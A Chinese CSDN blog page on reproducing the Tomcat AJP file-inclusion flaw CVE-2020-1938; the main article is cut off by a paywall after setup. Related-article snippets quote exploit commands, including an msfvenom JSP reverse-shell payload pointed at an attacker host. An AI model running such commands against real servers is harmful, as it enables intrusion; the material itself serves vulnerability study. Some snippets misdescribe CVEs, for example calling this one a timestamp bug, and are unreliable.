CVE-2020-1938

最新推荐文章于 2024-06-14 14:05:37 发布
最新推荐文章于 2024-06-14 14:05:37 发布
阅读量290 收藏 1
点赞数
分类专栏: 漏洞复现 tomcat 文章标签: tomcat 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48300170/article/details/118889211
版权
本文详细介绍了Apache Tomcat的CVE-2020-1938安全漏洞,该漏洞允许攻击者通过构造恶意请求读取服务器上的文件。影响范围包括Tomcat 6、7、8和9的部分版本。文中通过环境搭建、漏洞复现和修复步骤,演示了如何利用和防止此漏洞。建议受影响的用户禁用AJP端口或升级到最新版本,并设置AJP协议的认证凭证。
摘要由CSDN通过智能技术生成

CVE-2020-1938 Tomcat文件读取/包含漏洞复现

漏洞简介

      Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。

影响版本
    Apache Tomcat 6
    Apache Tomcat 7 < 7.0.100
    Apache Tomcat 8 < 8.5.51
    Apache Tomcat 9 < 9.0.31

漏洞信息

漏洞名称 漏洞编号 危害等级
Tomcat文件读取/包含漏洞 CVE-2020-1938 严重
CVSS评分 漏洞组件 受影响版本
9.9 Tomcat Apache Tomcat 6 等

环境搭建

  • Ubuntu 18.04 LTS
  • Tomcat-8.5.32
  • Docker
  • Nmap

漏洞复现

1.docker安装
首先更新资源update

sudo apt-get update

安装docker

sudo apt-get in

最低0.47元/天 解锁文章
NULL呀
关注
专栏目录
CVE-2021-21166
weixin_48300170的博客
07-14 1318
CVE-2021-21166 Chrome 远程代码执行0 Day 漏洞复现漏洞简介漏洞信息漏洞原理环境搭建漏洞复现漏洞修复 漏洞简介       在2021年2月11日,微软浏览器漏洞研究团队的研究员 Alison Huffman提交一个0day漏洞。       一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式
中间件安全—Tomcat常见漏洞
最新发布
qq_53058639的博客
07-08 1057
链接。
CVE-2020-1938:CVE-2020-1938
03-20
CVE-2020-1938 工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果由用户负责 通过测试研究发现,该突破危害及其严重,涉及非常广泛,如果发现建议立即进行修复 apache-tomcat-8.5.32.zip测试tomcat 验证工具-1(有BUG): 任意文件读取 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp 文件包含 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp 打包方式:在目录tomcat / ajp-bug执行mvn clean compile assembly:assembly 来源: : 验证工具-2
Tomcat AJP 文件包含漏洞(CVE-2020-1938
m0_61506558的博客
11-20 8055
1.漏洞简介1.漏洞简介2020年2月20日,公开CNVD 的漏洞公告中发现 Apache Tomcat文件包含漏洞(CVE-2020-1938)。是Apache开源组织开发的用于处理HTTP服务的项目。Apache Tomcat 服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控参数。
CVE-2020-1938.zip
04-15
CVE-2020-1938:Apache Tomcat AJP协议远程代码执行漏洞】 CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞,该漏洞允许攻击者通过AJP(Apache JServ Protocol)接口来实现远程代码执行,从而对目标系统...
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
# CVE-2020-1938 Apache Tomcat 文件包含 影响版本: Tomcat6-9 Exp: ``` python CNVD-2020-10487-Tomcat-Ajp-lfi.py x.x.x.x -p 8009 -f urfile 一. 漏洞概述 2月20日,国家信息安全漏洞共享平台(CNVD)...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938
weixin_45653478的博客
05-10 713
CVE-2020-1938 是 Apache Tomcat 中的一个严重安全漏洞,该漏洞涉及到 Tomcat 的 AJP(Apache JServ Protocol)连接器。由于 AJP 协议在处理请求时存在缺陷,攻击者可以利用此漏洞读取服务器上的任意文件,甚至可能进一步实现远程代码执行。
CVE-2020-1938TomcatAjpScanner-master.zip
02-23
CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!
Apache Tomcat CVE-2020-1938 漏洞
weixin_51194266的博客
06-21 1万+
所选漏洞:Apache Tomcat远程代码执行漏洞 漏洞编号:CVE-2020-1938 简单的环境搭建与POC验证
漏洞复现笔记(CVE-2020-1938
weixin_72760965的博客
06-14 338
cve-2020-1938是一个出现在Apache-Tomcat-Ajp的文件包含漏洞,攻击者可以利用该漏洞读取包含Tomcat上所有的webapp目录下的任意文件,如:webapp配置文件或源代码。对于处在漏洞影响版本范围内的 Tomcat 而言,若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下,即存在被 Ghostcat 漏洞利用的风险。通过nmap扫出开放端口:8080,8009,并且8009端口的AJP协议是开启的。然后直接通过exp读取。
tomcat CVE-2020-1938
qq_46804551的博客
04-08 123
搭建 下载好运行即可 访问成功 漏洞复现 Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。 攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。 漏洞验证POC https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 漏洞验证,尝试读取文件: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 成功访问到配置文
Tomcat Ajp文件读取漏洞复现(CVE-2020-1938
drhrht的博客
04-10 1515
漏洞简介 由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 https://cve.mitre.org/cgi-bin/cvename.cginame=2020-1938 影响范围 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 环境搭建
CVE-2020-1938(RCE利用)
热门推荐
午夜安全
03-27 1万+
CVE-2020-1938(RCE利用) 1.使用msf生成反弹shell马,并且监听 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png 假设利用上传点,把此图片上传到了目标服务器/log/shell.png。 在msf监听: msf > use expl...
cve-2020-1938修复
07-05
CVE-2020-1938是一个已知的安全漏洞(Common Vulnerabilities and Exposures,公开漏洞和暴露),它通常与软件或系统相关的安全弱点有关。这个特定漏洞可能影响的是某个未指明的具体软件产品,比如操作系统、网络设备、应用程序等。 20201938CVE表明这是一个时间戳依赖性的漏洞,可能利用了某些程序对时间戳处理不当的情况。攻击者可能会利用这种错误来执行未经授权的操作,例如提升权限、获取敏感信息,甚至完全控制受影响的系统,如果用户没有及时安装相应的补丁或更新来修复这个漏洞。 修复通常涉及软件供应商提供官方的安全更新,这些更新会修改可能导致漏洞的代码部分,并可能包含强化的安全措施,防止类似漏洞再次发生。用户应该尽快应用这些修复,以保护他们的系统免受潜在威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值